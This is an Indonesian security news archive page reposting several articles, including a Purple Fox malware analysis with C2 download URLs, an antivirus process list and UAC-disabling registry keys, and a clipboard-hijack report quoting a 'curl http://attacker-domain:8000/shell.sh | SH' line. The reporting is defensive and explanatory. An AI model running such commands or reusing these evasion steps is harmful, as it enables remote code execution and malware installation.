Naga Cyber Defense

Trusted Security for all of Indonesia

You are here: Home / Archives for Threat

Threat

Google mengakuisisi startup keamanan siber Siemplify seharga $500 juta

by

Google mengakuisisi startup cybersecurity Israel Siemplify, Harga akuisisi tersebut diperkirakan mencapai $500 juta. Siemplify mempekerjakan 200 orang di Israel, AS, dan London, yang akan bergabung dengan Google setelah akuisisi.

Google akan menggunakan Siemplify untuk membentuk dasar bagi operasi keamanan sibernya di Israel yang akan menjadi bagian dari aktivitas cloud perusahaan. Pendiri Siemplify akan melanjutkan di perusahaan.

CEO Google Sundar Pichai berjanji kepada Presiden AS Joe Biden bahwa perusahaan akan menginvestasikan $10 miliar dalam keamanan siber selama lima tahun ke depan. Google berencana memperluas program tanpa kepercayaan, membantu mengamankan rantai pasokan perangkat lunak, dan meningkatkan keamanan sumber terbuka.

Perusahaan berjanji untuk melatih 100.000 orang Amerika di bidang-bidang seperti Dukungan TI dan Analisis Data, mempelajari keterampilan sesuai permintaan termasuk privasi dan keamanan data. Janji ini akan mencakup akuisisi dan investasi, dengan Siemplify menjadi pembelian pertama Google yang telah menginvestasikan $50 juta di perusahaan keamanan siber Israel lainnya, Cybereason, tahun lalu.

Siemplify telah mengumpulkan $58 juta selama empat putaran hingga saat ini, dengan VC G20 Ventures Israel sebagai pemegang saham terbesar perusahaan. Investor tambahan termasuk 83North, Jump Capital, dan Georgian, yang baru-baru ini juga berinvestasi di startup keamanan siber Israel Noname Security.

Platform Operasi Keamanan Siemplify dirancang untuk menjadi “sistem operasi” SOC (pusat operasi keamanan). Tidak seperti platform SOAR (orkestrasi keamanan, otomatisasi, dan respons) lainnya yang sebagian besar berfokus pada pembuatan buku pedoman dan otomatisasi, Siemplify dirancang untuk mengelola seluruh fungsi operasi keamanan dari ujung ke ujung. Platform perusahaan akan diintegrasikan ke dalam sistem cloud Google.

Analis dapat memprioritaskan ancaman yang berpotensi diabaikan, memungkinkan mereka untuk menyelidiki, sebagai satu, peringatan yang mungkin telah diterima dari sensor keamanan terpisah tetapi merupakan bagian dari ancaman yang sama.

Akuisisi terbesar Google di Israel hingga saat ini adalah kesepakatan $1,1 miliar untuk Waze pada 2016. Pada 2019, Google Cloud mengakuisisi perusahaan Israel Elastifile seharga $200 juta dan Aluma seharga $100 juta

Sumber : CTECH

Installer Telegram Menjatuhkan Rootkit Purple Fox

by

Kami sering mengamati aktor ancaman menggunakan perangkat lunak yang sah untuk menjatuhkan file berbahaya. Namun kali ini berbeda. Aktor ancaman ini mampu meninggalkan sebagian besar serangan di bawah radar dengan memisahkan serangan ke dalam beberapa file kecil, yang sebagian besar memiliki tingkat deteksi yang sangat rendah oleh mesin AV, dengan tahap akhir yang mengarah ke infeksi rootkit Purple Fox.

Berkat MalwareHunterTeam, kami dapat menggali lebih dalam ke dalam Telegram Installer yang berbahaya. Installer ini adalah autoit dikompilasi (freeware BASIC-seperti scripting bahasa yang dirancang untuk mengotomatisasi Windows GUI dan scripting umum) script yang disebut “Telegram Desktop.exe”:

Skrip AutoIt ini adalah tahap pertama dari serangan yang menciptakan folder baru bernama “TextInputh” di bawah C:UsersUsernameAppDataLocalTemp dan menjatuhkan penginstal Telegram yang sah (yang bahkan tidak dieksekusi) dan pengunduh berbahaya (TextInputh.exe).

Saat dijalankan, TextInputh.exe membuat folder baru bernama “1640618495” di bawah direktori C:UsersPublicVideos. TextInputh.exe file digunakan sebagai pengunduh untuk tahap berikutnya dari serangan. Ini menghubungi server C&C dan mengunduh dua file ke folder yang baru dibuat:

  • 1.rar – yang berisi file untuk tahap berikutnya. 7zz.exe – archiver 7z yang sah.
  • 7zz.exe digunakan untuk unarchive 1.rar, yang berisi file-file berikut:

Selanjutnya, TextInputh.exe melakukan tindakan berikut:

  • Menyalin 360.tct dengan nama “360.dll”, rundll3222.exe dan svchost.txt ke folder ProgramData
  • Mengeksekusi ojbk.exe dengan baris perintah “ojbk.exe -a”
  • Menghapus 1.rar dan 7zz.exe dan keluar dari proses

ojbk.exe
Ketika dijalankan dengan argumen “-a”, file ini hanya digunakan untuk secara reflektif memuat file berbahaya 360.dll:

DLL ini bertanggung jawab untuk membaca file svchost.txt yang dijatuhkan. Setelah itu, kunci registri HKEY_LOCAL_MACHINESYSTEMSelectMarkTime baru dibuat, yang nilainya sama dengan waktu svchost saat ini.exe dan kemudian, muatan svchost.txt dieksekusi.

svchost.txt
Saat aliran serangan berlanjut, file ini tampaknya berisi kode byte dari tahap berikutnya dari muatan berbahaya yang dieksekusi oleh 360.dll. Sebagai tindakan pertama svchost.txt, ia memeriksa keberadaan HKLM SOFTWAREMicrosoftWindowsCurrentVersionApp Paths360safe.exePath registry key. Jika kunci registri ditemukan, aliran serangan akan melakukan langkah tambahan sebelum melanjutkan ke tahap berikutnya:

Serangan tersebut menjatuhkan lima file lagi ke dalam folder ProgramData:

  • Calldriver.exe – file ini digunakan untuk mematikan dan memblokir inisiasi 360 AV
  • Driver.sys – setelah file ini dijatuhkan, layanan driver sistem baru bernama “Driver” dibuat dan dimulai pada PC dan BMD yang terinfeksi.txt dibuat dalam folder ProgramData
  • dll.dll – dieksekusi setelah bypass UAC. Teknik bypass UAC yang digunakan oleh svchost.txt adalah “bypass UAC menggunakan antarmuka CMSTPLUA COM” dan dijelaskan dengan baik di sini. Teknik ini umumnya digunakan oleh penulis ransomware LockBit dan BlackMatter. Dll.dll dijalankan dengan baris perintah “C:ProgramDatadll.dll, luohua”.
  • kill.bat – skrip batch yang dieksekusi setelah drop file berakhir. Naskahnya adalah:
  • speedmem2.hg – SQLite file

Semua file ini bekerja sama untuk mematikan dan memblokir inisiasi 360 proses AV dari ruang kernel, sehingga memungkinkan alat serangan tahap berikutnya (Purple Fox Rootkit, dalam kasus kami) berjalan tanpa terdeteksi.

Setelah file drop dan eksekusi, payload bergerak ke langkah berikutnya, yaitu komunikasi C &C. Seperti disebutkan di atas, jika HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Paths360safe.exePath registry key tidak ditemukan, alurnya hanya melompat ke langkah ini.

Pertama, alamat C &C hardcoded ditambahkan sebagai mutex. Selanjutnya, informasi korban berikut dikumpulkan:

  • Nama host
  • CPU – dengan mengambil nilai HKLMHARDWAREDESCRIPTIONSystemCentralProcessor0 ~MHz registry key
  • Status memori
  • Tipe Kandar
  • Tipe Prosesor – dengan memanggil GetNativeSystemInfo dan memeriksa nilai wProcessorArchitecture.

Selanjutnya, malware memeriksa apakah ada proses berikut yang berjalan di PC korban:

  • 360tray.exe – 360 Total Security
  • 360sd.exe – 360 Total Security
  • kxetray.exe – Kingsoft Internet Security
  • KSafeTray.exe – Kingsoft Internet Security
  • QQPCRTP.exe – Tencent
  • HipsTray.exe – HeroBravo System Diagnostics
  • BaiduSd.exe – Baidu Anti-Virus
  • baiduSafeTray.exe – Baidu Anti-Virus
  • KvMonXP.exe – Jiangmin Anti-Virus
  • RavMonD.exe – Rising Anti-Virus
  • QUHLPSVC.EXE – Quick Heal Anti-Virus
  • mssecess.exe – Microsoft MSE
  • cfp.exe – COMODO Internet Security
  • SPIDer.exe
  • acs.exe
  • V3Svc.exe – AhnLab V3 Internet Security
  • AYAgent.aye – ALYac Software
  • avgwdsvc.exe – AVG Internet Security
  • f-secure.exe – F‑Secure Anti‑Virus
  • avp.exe – Kaspersky Anti-Virus
  • Mcshield.exe – McAfee Anti-Virus
  • egui.exe – ESET Smart Security
  • knsdtray.exe
  • TMBMSRV.exe – Trend Micro Internet Security
  • avcenter.exe – Avira Anti-Virus
  • ashDisp.exe – Avast Anti-Virus
  • rtvscan.exe – Symantec Anti-Virus
  • remupd.exe – Panda software
  • vsserv.exe – Bitdefender Total Security
  • PSafeSysTray.exe – PSafe System Tray
  • ad-watch.exe
  • K7TSecurity.exe – K7Security Suite
  • UnThreat.exe – UnThreat Anti-Virus

Tampaknya setelah pemeriksaan ini selesai, semua informasi yang dikumpulkan, termasuk produk keamanan mana yang berjalan, dikirim ke server C &C.

Pada saat penyelidikan, server C&C sudah down, tetapi pemeriksaan cepat dari alamat IP dan file terkait lainnya semua menunjukkan bahwa tahap terakhir dari serangan ini adalah download dan eksekusi dari Purple Fox Rootkit. Purple Fox menggunakan fungsi msi.dll, ‘MsiInstallProductA’, untuk mengunduh dan menjalankan muatannya. Payload adalah file .msi yang berisi shellcode terenkripsi termasuk versi 32-bit dan 64-bit. Setelah dijalankan, sistem akan dimulai ulang dengan registri ‘PendingFileRenameOperations’ untuk mengganti nama komponennya. Dalam kasus kami, Purple Fox Rootkit diunduh dari hxxp://144.48.243[.] 79:17674/C558B828.Png.

Dll.dll
DLL ini hanya digunakan untuk menonaktifkan UAC dengan mengatur tiga kunci registri berikut ke 0:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop

Calldriver.exe
Digunakan untuk mematikan dan memblokir inisiasi 360 proses AV dari ruang kernel. Teknik yang digunakan dijelaskan di sini di bawah paragraf “The ProcessKiller rootkit vs. produk keamanan”.

Kami menemukan sejumlah besar installer berbahaya yang memberikan versi rootkit Purple Fox yang sama menggunakan rantai serangan yang sama. Sepertinya beberapa dikirim melalui email, sementara yang lain kami anggap diunduh dari situs web phishing. Keindahan serangan ini adalah bahwa setiap tahap dipisahkan ke file yang berbeda yang tidak berguna tanpa seluruh set file. Ini membantu penyerang melindungi file-nya dari deteksi AV.

Minerva Labs mendeteksi hubungan proses berbahaya dan mencegah malware menulis dan mengeksekusi muatan berbahaya:

IOC’s
Hash:

  • 41769d751fa735f253e96a02d0cccadfec8c7298666a4caa5c9f90aaa826ecd1 – Telegram Desktop.exe
  • BAE1270981C0A2D595677A7A1FEFE8087B07FFEA061571D97B5CD4C0E3EDB6E0 – TextInputh.exe
  • af8eef9df6c1f5645c95d0e991d8f526fbfb9a368eee9ba0b931c0c3df247e41 – legitimate telegram installer
  • 797a8063ff952a6445c7a32b72bd7cd6837a3a942bbef01fc81ff955e32e7d0c – 1.rar
  • 07ad4b984f288304003b080dd013784685181de4353a0b70a0247f96e535bd56 – 7zz.exe
  • 26487eff7cb8858d1b76308e76dfe4f5d250724bbc7e18e69a524375cee11fe4 – 360.tct
  • b5128b709e21c2a4197fcd80b072e7341ccb335a5decbb52ef4cee2b63ad0b3e – ojbk.exe
  • 405f03534be8b45185695f68deb47d4daf04dcd6df9d351ca6831d3721b1efc4 – rundll3222.exe – legitimate rundll32.exe
  • 0937955FD23589B0E2124AFEEC54E916 – svchost.txt
  • e2c463ac2d147e52b5a53c9c4dea35060783c85260eaac98d0aaeed2d5f5c838 – Calldriver.exe
  • 638fa26aea7fe6ebefe398818b09277d01c4521a966ff39b77035b04c058df60 – Driver.sys
  • 4bdfa7aa1142deba5c6be1d71c3bc91da10c24e4a50296ee87bf2b96c731b7fa – dll.dll
  • 24BCBB228662B91C6A7BBBCB7D959E56 – kill.bat
  • 599DBAFA6ABFAF0D51E15AEB79E93336 – speedmem2.hg

IP’s:

  • 193.164.223[.]77 – second stage C&C server.
  • 144.48.243[.]79 – last stage C&C server.

Url:

  • hxxp://193.164.223[.]77:7456/h?=1640618495 – contains 1.rar file
  • hxxp://193.164.223[.]77:7456/77 – contain 7zz.exe file
  • hxxp://144.48.243[.]79:17674/C558B828.Png – Purple Fox Rootkit

Sumber daya:
https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox

Sumber: Minerva

Jangan salin tempel perintah dari halaman web — Anda bisa diretas

by

Baru-baru ini, Gabriel Friedlander, pendiri platform pelatihan kesadaran keamanan Wizer mendemonstrasikan peretasan yang jelas namun mengejutkan yang akan membuat Anda berhati-hati dalam menyalin-menempelkan perintah dari halaman web.

Friedlander memperingatkan sebuah halaman web dapat secara diam-diam mengganti konten dari apa yang ada di clipboard Anda, dan yang lebih buruk lagi pengembang mungkin hanya menyadari kesalahan mereka setelah menempelkan teks, dan pada saat itu mungkin sudah terlambat.

Dalam bukti konsep sederhana (PoC) yang diterbitkan di blognya, Friedlander meminta pembaca untuk menyalin perintah sederhana yang akan dikenal oleh sebagian besar sysadmin dan pengembang:

Halaman HTML Friedlander dengan perintah sederhana yang dapat Anda salin ke clipboard

Sekarang, tempelkan apa yang Anda salin dari blog Friedlander ke dalam kotak teks atau Notepad, dan hasilnya mungkin akan membuat Anda terkejut:

curl http://attacker-domain:8000/shell.sh | SH

Anda tidak hanya mendapatkan perintah yang sama sekali berbeda di clipboard Anda, tetapi untuk memperburuk keadaan, ia memiliki karakter baris baru (atau kembali) di akhir.

Mereka yang menempelkan teks mungkin mendapat kesan bahwa mereka menyalin perintah sudo apt update yang familier dan tidak berbahaya yang digunakan untuk mengambil informasi terbaru pada perangkat lunak yang diinstal pada sistem Anda.

Keajaibannya ada pada kode JavaScript yang tersembunyi di balik pengaturan halaman HTML PoC oleh Friedlander. Setelah Anda menyalin teks “sudo apt update” yang terdapat dalam elemen HTML, cuplikan kode, yang ditampilkan di bawah ini berjalan.

Apa yang terjadi setelahnya adalah ‘pendengar acara’ JavaScript yang menangkap peristiwa penyalinan dan mengganti data papan klip dengan kode uji berbahaya Friedlander:

Kode JavaScript PoC yang menggantikan konten clipboard

“Inilah mengapa Anda TIDAK PERNAH menyalin perintah tempel langsung ke terminal Anda,” Friedlander memperingatkan.

“Anda pikir Anda menyalin satu hal, tetapi itu diganti dengan sesuatu yang lain, seperti kode berbahaya. Yang diperlukan hanyalah satu baris kode yang disuntikkan ke dalam kode yang Anda salin untuk membuat pintu belakang ke aplikasi Anda.”

Seorang pengguna Reddit juga menyajikan contoh alternatif dari trik ini yang tidak memerlukan JavaScript: teks tak terlihat yang dibuat dengan gaya HTML dan CSS yang disalin ke clipboard Anda saat Anda menyalin bagian teks yang terlihat:

HTML yang tidak terlihat (kiri) diambil selama salin-tempel dan memiliki garis tambahan (kanan)

“Masalahnya bukan hanya situs web dapat mengubah konten clipboard Anda menggunakan JavaScript,” jelas pengguna, SwallowYourDreams.

“Bisa juga hanya menyembunyikan perintah dalam HTML yang tidak terlihat oleh mata manusia, tetapi akan disalin oleh komputer.”

Jadi, alasan lain untuk tidak pernah secara membabi buta mempercayai apa yang Anda salin dari halaman web—lebih baik tempel di editor teks terlebih dahulu.

Sumber : Bleeping Computer

Empat tahun layanan Aplikasi Azure memiliki bug kebocoran kode sumber

by

Microsoft telah mengungkapkan kerentanan dalam Layanan Aplikasi Azure untuk Linux yang memungkinkan pengunduhan file yang hampir pasti tidak ingin dipublikasikan oleh pengguna.

Microsoft menagih Layanan Aplikasi Azure sebagai hal yang tepat jika Anda ingin “Membuat aplikasi web dan seluler yang siap untuk perusahaan dengan cepat dan mudah untuk platform atau perangkat apa pun, dan menerapkannya pada infrastruktur cloud yang dapat diskalakan dan andal.”

Perhatikan bahwa deskripsi tidak menyebutkan keamanan.

Kelalaian itu anehnya terlihat, karena pakaian keamanan cloud Wiz menyelidiki layanan dan menemukan apa yang digambarkan sebagai “perilaku default tidak aman di Layanan Aplikasi Azure yang mengekspos kode sumber aplikasi pelanggan yang ditulis dalam PHP, Python, Ruby, atau Node, yang dikerahkan menggunakan ‘Local Git’.”

Wiz telah menamai cacat itu “NotLegit” dan menegaskan itu sudah ada sejak September 2017 dan “mungkin telah dieksploitasi di alam liar.”

Inti dari kelemahannya adalah ketika pengguna Layanan Aplikasi Azure mengunggah repositori git mereka ke layanan, repositori tersebut mendarat di direktori /home/site/wwwroot direktori yang dapat diakses publik. Di antara unggahan itu adalah folder .git, yang berisi kode sumber dan info rahasia lainnya. Semuanya tergantung di web untuk dilihat semua orang.

Orang-orang sedang mencari. Postingan Wiz menyatakan bahwa ia membuat aplikasi Layanan Aplikasi Azure yang rentan dan dalam empat hari mendeteksi beberapa upaya untuk mencapai folder .gitnya.

Wiz telah menemukan bug Azure yang buruk, ia juga menemukan kelemahan ChaosDB yang memungkinkan akses baca dan tulis yang tidak sah ke Microsoft Azure Cosmos DB, dan keluarga kelemahan “OMIGOD” yang memungkinkan eksekusi kode tidak sah di server Azure.

Microsoft membayar hadiah $7.500 kepada Wiz untuk menemukan kelemahannya, yang diungkapkan secara bertanggung jawab pada bulan September, dan melihat Microsoft memberi tahu pelanggan tentang masalah tersebut sebelum mengungkapkannya dalam posting blog tertanggal 22 Desember.

Sumber : The Register

Pelaku ancaman menggunakan rootkit HP iLO untuk menghapus server

by

Sebuah perusahaan keamanan siber Iran mengatakan telah menemukan rootkit pertama dari jenisnya yang bersembunyi di dalam firmware perangkat HP iLO dan yang telah digunakan dalam serangan dunia nyata untuk menghapus server organisasi Iran.

Dinamakan iLOBleed, rootkit ditemukan oleh perusahaan keamanan Teheran Amnpardaz dan dirinci dalam sebuah laporan yang dirilis pada hari Selasa.

iLOBleed menargetkan HP iLO (Integrated Lights-Out), Perangkat iLO dilengkapi dengan unit prosesor, ruang penyimpanan, RAM, dan kartu jaringannya sendiri serta dijalankan secara terpisah dari sistem operasi lokal mana pun.

Peran utama mereka adalah menyediakan cara bagi administrator sistem untuk terhubung ke sistem jarak jauh, bahkan ketika sistem ini dimatikan, dan melakukan operasi pemeliharaan, seperti memperbarui firmware, menginstal pembaruan keamanan, atau menginstal ulang sistem yang rusak.

Amnpardaz mengatakan bahwa sejak tahun 2020, pihaknya menyelidiki beberapa insiden di mana aktor ancaman misterius mengkompromikan target dan bersembunyi di dalam iLO sebagai cara untuk bertahan dari penginstalan ulang OS dan mempertahankan kegigihan di dalam jaringan korban.

Untuk menghindari deteksi, para peneliti mengatakan penyerang menyamarkan rootkit iLOBleed sebagai modul untuk firmware iLO itu sendiri, dan penyerang juga membuat UI pembaruan palsu untuk ditunjukkan kepada administrator sistem ketika mereka mencoba memperbarui firmware iLO.

Bahkan jika rootkit memberikan kontrol penuh atas host yang terinfeksi, penyerang tampaknya hanya menggunakannya untuk menghapus sistem yang terinfeksi sebagai bagian dari semacam operasi penghapusan data.

“Ketika tim analisis keamanan kami menemukan malware, penyerang telah memutuskan untuk menghapus disk server dan sepenuhnya menyembunyikan jejak mereka,” tim Amnpardaz menjelaskan.

“Menariknya, penyerang tidak puas dengan penghancuran satu kali dan mengatur malware untuk berulang kali melakukan penghancuran data secara berkala. Mungkin mereka berpikir bahwa jika administrator sistem menginstal ulang sistem operasi, seluruh hard drive akan hancur lagi setelah beberapa saat. Jelas, mereka tidak mengira malware mereka akan ditemukan.”

Baik Amnpardaz dan anggota komunitas keamanan siber telah menggambarkan rootkit iLO sebagai karya tercanggih dan kemungkinan besar merupakan karya aktor ancaman yang sangat maju. Aktor itu sendiri tidak diidentifikasi dalam laporan Amnpardaz atau dalam percakapan online apa pun.

Sementara laporan Amnpardaz mengungkap keberadaan malware ini, masih ada pertanyaan tentang bagaimana awalnya digunakan. Teori yang berlaku saat ini mencakup skenario di mana penyerang memasuki jaringan korban melalui saluran lain dan kemudian menggunakan iLOBleed sebagai pintu belakang (mekanisme ketekunan), baik dengan mengeksploitasi kerentanan dalam firmware iLO lama atau dengan memperluas akses dari host yang terinfeksi ke kartu iLO-nya, jika ada .

Penemuan iLOBleed merupakan terobosan dan pencapaian, terutama karena hanya ada sedikit alat dan produk keamanan yang mampu mendeteksi aktivitas malware di tingkat iLO—komponen yang beroperasi lebih dalam daripada OS itu sendiri, biarkan produk keamanan tunggal.

Selengkapnya : The Record Media

Serangan firmware dapat menyusupkan malware persisten di area tersembunyi pada SSD

by

Satu serangan yang dimodelkan oleh para peneliti di Universitas Korea di Seoul menargetkan area data yang tidak valid dengan informasi yang tidak terhapus yang berada di antara ruang SSD yang dapat digunakan dan area over-provisioning (OP), dan yang ukurannya bergantung pada keduanya.

Makalah penelitian menjelaskan bahwa seorang peretas dapat mengubah ukuran area OP dengan menggunakan manajer firmware, sehingga menghasilkan ruang data tidak valid yang dapat dieksploitasi.

Masalahnya di sini adalah banyak produsen SSD memilih untuk tidak menghapus area data yang tidak valid untuk menghemat sumber daya.

Ruang ini tetap diisi dengan data untuk waktu yang lama, dengan asumsi bahwa pemutusan tautan tabel pemetaan sudah cukup untuk mencegah akses yang tidak sah.

Dengan demikian, aktor ancaman yang memanfaatkan kelemahan ini dapat memperoleh akses ke informasi yang berpotensi sensitif.

Para peneliti mencatat bahwa aktivitas forensik pada memori flash NAND dapat mengungkapkan data yang belum dihapus selama lebih dari enam bulan.

Dalam model serangan kedua, area OP digunakan sebagai tempat rahasia yang tidak dapat dipantau atau dihapus oleh pengguna, tempat aktor ancaman dapat menyembunyikan malware.

Sebagai pertahanan terhadap jenis serangan pertama, para peneliti mengusulkan pembuat SSD menghapus area OP dengan algoritma penghapusan semu yang tidak akan memengaruhi kinerja waktu nyata.

Untuk jenis serangan kedua, tindakan keamanan yang berpotensi efektif terhadap penyuntikan malware di area OP adalah dengan menerapkan sistem pemantauan laju data valid-tidak valid yang mengamati rasio di dalam SSD secara real-time.

Selengkapnya: Bleeping Computer

Peretas APT China Menggunakan Eksploitasi Log4Shell untuk Menargetkan Institusi Akademik

by

Kelompok intrusi bertarget berbasis di China yang belum pernah dilihat sebelumnya yang dijuluki Aquatic Panda telah diamati memanfaatkan kelemahan kritis di perpustakaan logging Apache Log4j sebagai vektor akses untuk melakukan berbagai operasi pasca-eksploitasi, termasuk pengintaian dan pengambilan kredensial pada sistem yang ditargetkan.

Perusahaan keamanan siber CrowdStrike mengatakan penyusupan itu, yang akhirnya berhasil digagalkan, ditujukan pada “lembaga akademis besar” yang tidak disebutkan namanya. Kelompok yang disponsori negara diyakini telah beroperasi sejak pertengahan 2020 dalam mengejar pengumpulan intelijen dan spionase industri, dengan serangannya terutama ditujukan terhadap perusahaan di sektor telekomunikasi, teknologi, dan pemerintah.

Upaya intrusi mengeksploitasi kelemahan Log4Shell yang baru ditemukan (CVE-2021-44228, skor CVSS: 10.0) untuk mendapatkan akses ke instance rentan dari desktop VMware Horizon dan produk virtualisasi aplikasi, diikuti dengan menjalankan serangkaian perintah jahat yang diatur untuk mengambil ancaman muatan aktor yang dihosting di server jauh.

“Versi modifikasi dari eksploitasi Log4j kemungkinan digunakan selama operasi aktor ancaman,” catat para peneliti, menambahkan itu melibatkan penggunaan eksploitasi yang diterbitkan di GitHub pada 13 Desember 2021.

Perilaku jahat Aquatic Panda lebih dari sekadar melakukan pengintaian terhadap host yang disusupi, dimulai dengan berupaya menghentikan layanan deteksi dan respons titik akhir (EDR) pihak ketiga, sebelum melanjutkan untuk mengambil muatan tahap berikutnya yang dirancang untuk mendapatkan shell terbalik dan pencurian kredensial.

Selengkapnya: The Hacker News

Mengapa Nomor Telepon Bau Sebagai Bukti Identitas

by

Nomor telepon bau untuk keamanan dan otentikasi. Mereka bau karena kebanyakan dari kita telah berinvestasi dalam angka-angka ini sehingga mereka menjadi identitas de facto. Pada saat yang sama, ketika Anda kehilangan kendali atas nomor telepon — mungkin itu dibajak oleh penipu, Anda berpisah atau bercerai, atau Anda terlambat membayar tagihan telepon Anda siapa pun yang mewarisi nomor itu dapat menjadi Anda di banyak tempat online.

Nixon mengatakan sebagian besar perspektifnya tentang identitas seluler diwarnai oleh lensa pekerjaannya, yang membuatnya mengidentifikasi beberapa penjahat terbesar yang terlibat dalam pembajakan nomor telepon melalui serangan pertukaran SIM. Pertukaran SIM ilegal memungkinkan penipu untuk membajak nomor telepon target dan menggunakannya untuk mencuri data keuangan, kata sandi, cryptocurrency, dan barang berharga lainnya dari korban.

Nixon mengatakan banyak perusahaan pada dasarnya telah membangun otentikasi pelanggan mereka di sekitar nomor telepon, dan bahwa banyak situs masih membiarkan pengguna mengatur ulang kata sandi mereka dengan tidak lebih dari kode satu kali yang dikirim ke nomor telepon di akun. Dalam serangan ini, penipu tidak perlu mengetahui kata sandi korban untuk membajak akun: Dia hanya perlu memiliki akses ke nomor ponsel target.

Di luar serangan pertukaran SIM, ada beberapa cara agar nomor telepon dapat ditransfer ke pemilik baru, kata Nixon. Alasan terbesar adalah kurangnya pembayaran untuk tagihan telepon masa lalu. Tetapi mungkin seseorang mengalami perceraian atau perpisahan yang tidak menyenangkan, dan tidak dapat lagi mengakses telepon atau akun telepon mereka. Akun dikirim ke koleksi dan ditutup, dan nomor telepon dilepaskan kembali ke kumpulan umum untuk penugasan kembali setelah jangka waktu tertentu.

Brian Krebs (BK): Anda punya pengalaman sendiri seperti ini. Atau semacam. Anda memberitahu.

Allison Nixon (AN): Setiap perusahaan intelijen ancaman akan memiliki beberapa jenis fungsi bisnis yang memerlukan pembelian ponsel burner cukup sering, yang melibatkan mendapatkan nomor telepon baru. Saat Anda mendapatkan nomor baru, nomor tersebut didaur ulang dari pemilik sebelumnya karena mungkin tidak ada nomor baru lagi. Saya mendapatkan banyak berbagai pesan teks untuk pengaturan ulang kata sandi. Yang terus saya terima adalah SMS dari bank orang ini. Setiap kali dia mendapat setoran, saya akan mendapatkan SMS yang mengatakan berapa banyak yang disetorkan dan beberapa informasi dasar tentang akun tersebut.

Saya mendekati bank karena saya khawatir bahwa mungkin orang acak ini akan terancam oleh penelitian keamanan yang akan kami lakukan dengan nomor baru ini. Saya meminta mereka untuk menghapus nomornya, tetapi mereka mengatakan tidak ada yang bisa mereka lakukan untuk itu.

Suatu kali saya tidak sengaja membajak akun orang secara acak. Saya mencoba untuk mendapatkan kembali akun saya sendiri di penyedia layanan online, dan saya memasukkan nomor telepon burner ke situs, melalui proses reset kata sandi SMS, mendapatkan tautan dan dikatakan ‘Selamat Datang Kembali’ untuk beberapa nama pengguna yang saya tidak’ tidak tahu. Kemudian saya mengklik oke dan tiba-tiba membaca pesan pribadi akun tersebut.

Saya menyadari bahwa saya telah membajak akun pemilik telepon sebelumnya. Itu tidak disengaja, tetapi juga sangat jelas bahwa tidak ada alasan teknis saya tidak dapat membajak lebih banyak akun yang terkait dengan nomor ini. Ini adalah masalah yang mempengaruhi banyak penyedia layanan. Ini bisa saja terjadi di banyak, banyak situs web lain.

BK: Kami tidak selalu terikat dengan nomor telepon kami, kan? Apa yang terjadi?

AN: Seluruh konsep nomor telepon sudah ada sejak seratus tahun yang lalu. Operator akan memasukkan nomor yang Anda tahu terkait dengan teman Anda dan Anda dapat menelepon orang itu dan berbicara dengan mereka. Saat itu, telepon tidak mengikat identitas seseorang, dan kepemilikan nomor telepon itu tidak pernah membuktikan identitas orang itu.

Tetapi hari ini, nomor telepon terikat dengan identitas orang, meskipun kami mendaur ulangnya dan daur ulang ini adalah bagian mendasar dari cara kerja sistem telepon. Terlepas dari kenyataan bahwa daur ulang nomor telepon selalu ada, kami masih memiliki semua perusahaan Internet yang telah memutuskan mereka akan menerima nomor telepon sebagai dokumen identitas dan itu mengerikan.

BK: Bagaimana nomor telepon dibandingkan dengan dokumen identitas fisik yang lebih tradisional?

AN: Ambil konsep tradisional dokumen identitas — di mana Anda harus secara fisik menunjukkan dan menunjukkan ID di beberapa jenis bisnis atau kantor, dan kemudian dari sana mereka akan mencari akun Anda dan Anda dapat melakukan transaksi. Online, ini benar-benar berbeda dan Anda tidak dapat secara fisik menunjukkan ID Anda dan tidak dapat menunjukkan wajah Anda.

Dalam ekosistem Internet, ada berbagai perusahaan dan layanan yang menjual barang secara online yang telah menetapkan berbagai faktor yang dianggap sebagai proxy yang cukup baik untuk dokumen identitas. Anda memberikan nama pengguna, kata sandi, dan terkadang Anda memberikan alamat email atau nomor telepon Anda. Sering kali ketika Anda mengatur akun Anda, Anda memiliki semacam cara yang disepakati untuk membuktikannya dari waktu ke waktu. Berdasarkan protokol yang telah ditetapkan sebelumnya, pengguna dapat masuk dan melakukan transaksi.

Ini bukan sistem yang baik dan cara semuanya bekerja hanya memungkinkan penipuan. Saat Anda terhambat untuk muncul secara fisik di suatu tempat, hanya ada begitu banyak penipuan yang dapat Anda lakukan. Banyak serangan terhadap perusahaan telepon tidak menyerang nilai yang melekat pada nomor telepon, tetapi penggunaannya sebagai dokumen identitas.

BK: Anda mengatakan daur ulang nomor telepon adalah bagian mendasar dari cara kerja sistem telepon. Bicara lebih banyak tentang itu, betapa umum itu.

AN: Anda bisa saja bercerai, atau tiba-tiba jatuh miskin setelah kehilangan pekerjaan. Tetapi nomor itu dapat diberikan, dan jika itu diberikan kepada orang lain, Anda tidak akan mendapatkannya kembali. Ada semua jenis situasi kehidupan di mana nomor telepon bukan pengidentifikasi yang baik.

Mungkin sebagian alasan mengapa seluruh masalah daur ulang nomor telepon tidak mendapat banyak perhatian adalah orang-orang yang tidak dapat membayar tagihan mereka mungkin tidak memiliki banyak uang untuk dicuri, tetapi cukup mengerikan bahwa situasi ini dapat disalahgunakan untuk menendang orang ketika mereka jatuh. Saya tidak berpikir banyak uang dapat dicuri dengan cara ini, tetapi saya pikir fakta bahwa ini benar-benar terjadi dapat merusak keseluruhan sistem.

BK: Menurut saya itu akan menjadi hal yang baik jika lebih banyak pedagang online memudahkan untuk masuk ke situs mereka tanpa menggunakan kata sandi, tetapi dengan aplikasi yang hanya bertanya, apakah Anda baru saja mencoba masuk? Ya? Oke. Boom, Anda sudah login. Sepertinya login “push” semacam ini dapat memanfaatkan ponsel pintar pengguna tanpa mengandalkan nomor — atau kata sandi, dalam hal ini.

Jika nomor telepon buruk, apa yang harus kita lihat sebagai pengenal yang lebih andal dan tangguh?

